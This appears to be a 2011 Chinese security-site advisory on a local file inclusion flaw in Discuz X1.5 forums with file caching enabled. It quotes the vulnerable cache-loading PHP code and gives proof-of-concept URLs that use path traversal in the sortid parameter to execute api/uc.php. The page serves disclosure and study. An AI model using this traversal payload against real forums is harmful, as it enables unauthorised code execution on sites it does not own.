DISCUZ X1.5 本地文件包含漏洞_安全漏洞聚焦_黑客防线网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN

DISCUZ X1.5 本地文件包含漏洞

作者:黑客防线网安网站维护基地 来源:黑客防线网安网站维护基地 浏览次数:0

本篇关键词:后台漏洞DZDISCUZ
黑客防线网安网讯:DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。
  config_global.php
DISCUZX1.5 本地文件包含当然是有条件的就是使用文件作为缓存

  config_global.php

  $_config['cache']['type'] = ‘file’;

  function cachedata($cachenames) {

  ……

  $isfilecache = getglobal(‘config/cache/type’) == ‘file’;

  ……

  if($isfilecache) {

  $lostcaches = array();

  foreach($cachenames as $cachename) {

  if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {

  $lostcaches[] = $cachename;

  }

  }

  ……

  }

  地址:

  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

  执行了 api/uc.php 页面代码了

    黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-5146-1.html
网站维护教程更新时间:2011-07-24 01:18:11  【打印此页】  【关闭
我要申请本站N点 | 黑客防线官网 |  
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479

footer  footer  footer  footer